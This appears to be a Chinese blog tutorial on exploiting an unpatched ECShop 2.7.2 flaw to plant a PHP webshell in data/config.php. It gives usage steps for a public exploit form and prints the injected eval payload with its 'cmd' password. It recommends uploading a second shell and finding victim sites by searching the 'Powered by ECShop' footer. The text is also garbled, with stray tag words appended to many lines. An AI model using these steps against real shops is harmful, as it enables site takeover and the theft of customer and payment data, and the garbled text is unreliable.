ECSHOP號稱最大的開源網店系統,官方是這樣介紹它的:「ECShop網店系統是一套免費開源的網上商店軟件,不管在穩定性、代碼優化、運行效率、負載能力、安全等級、功能可操控性和權限嚴密性等方面都居國內外同類產品領先地位。php
按照個人理解,做爲一款網店系統,系統的安全性應該擺在很重要的位置,但ECSHOP卻好像漏洞不斷。就在前幾天,xhming大牛又公佈了一個ECSHOP前臺寫shell的Oday,利用漏洞得到shell很是簡單,能夠說是秒殺。從官方下載的ECSHOP的最新版本也存在這個漏洞,官方尚未出相應的補丁或對軟件進行升級修補這個漏洞。html
ECSHOP出現新漏洞對我來講是件好事,由於又有拿shell的漏洞了,哈哈。也但願ECSHOP在漏洞挖掘者的鞭策下能把ECSHOP作的更安全,更優秀,畢竟網店系統涉及網絡交易,不是鬧着玩的。shell
1、漏洞簡介瀏覽器
出現漏洞的文件是demo目錄下的index.php,代碼我就不貼出來了!安全
關於漏洞的詳細介紹請看漏洞出處。網絡
2、漏洞利用方法函數
具體的漏洞分析我也不會,直接來看怎麼利用這個漏洞來得到shell。目前ECSHOP的最新版本爲,我危險漫步從官方下載了GBK版本的ECShop_V2.7.2pGBK Release0604,在虛擬機的PHPP環境中把ECSHOP安裝了起來。學習
在論壇的一篇文章中xhming給出了一個漏洞利用的EXP,是一個用於提交數據的html文件,兩次提交後會自動打開demo/index.php,頁面上會顯示phpinfo,xhming說了,提優化
交內容能夠隨意,言下之意就是你能夠本身構造提交內容直接得到shell而不是象徵性的執行phpinfo()函數。但並非每一個人都會構造直接得到shell的提交內容,好在Mr.LP在xhming的EXP的基礎上修改後給出了能夠直接得到shell的EXP。網站
使用方法:
1.修改form中action的內容爲須要網址。
2.提交表單一次。
3.鏈接一句話木馬,密碼爲cmd。把上面代碼保存爲exp.html,直接打開發現有亂碼。把「charset=utf-8」修改成「charset=gbk」後亂碼問題解決了。
用記事本打開exp.html,把提交地址修改成我虛擬機中ECSHOP的提交地址,保存修改後打開exp.html,點「提交」按鈕後顯示的結果,會把php-句話木馬寫到data目錄下的config.php文件中,用lanker-句話PHP後門客戶端鏈接,密碼cmd,發現php-句話木馬不能用。
在頁面按網頁瀏覽器的後退按鈕來到exp.html,點「提交」按鈕再提交一次數據。提交完數據後再次用lanker-句話PHP後門客戶端鏈接,此次得到了shell)。
原來要提交兩次才能得到shell,這裏要注意一下。
經過比較原來的data目錄下的config.php和得到shell後的config.php,發現經過兩次提交數據向config.php中寫入了下面的數據:define('EC_LANGUAGEI',.);@eVal($一POST[cmd]);#');@eval($_POST[cmdl);#’);。建議用得到的shell上傳另外一個shell上去。而後去掉config.php中新寫入的數據。
經過搜索「Powered by ECShop v2,7.2」等可能找到存在這個漏洞的網站。ecshop的前臺寫shell 0day危險漫步就給你們介紹到這裏,本身有ECSHOP網站的朋友等官方出了這個漏洞的補丁後快打上吧,漏洞很嚴重。這個漏洞利用起來很是簡單,只須要寫上目標網站的地址點兩次「提交」按鈕就得到了shell,對存在這個漏洞的網站能夠說是秒殺。但願在利用這個漏洞拿shell時不要對網站形成破壞,若是能知道出現這個漏洞的緣由而且學習漏洞利用的方法和思路就更好了。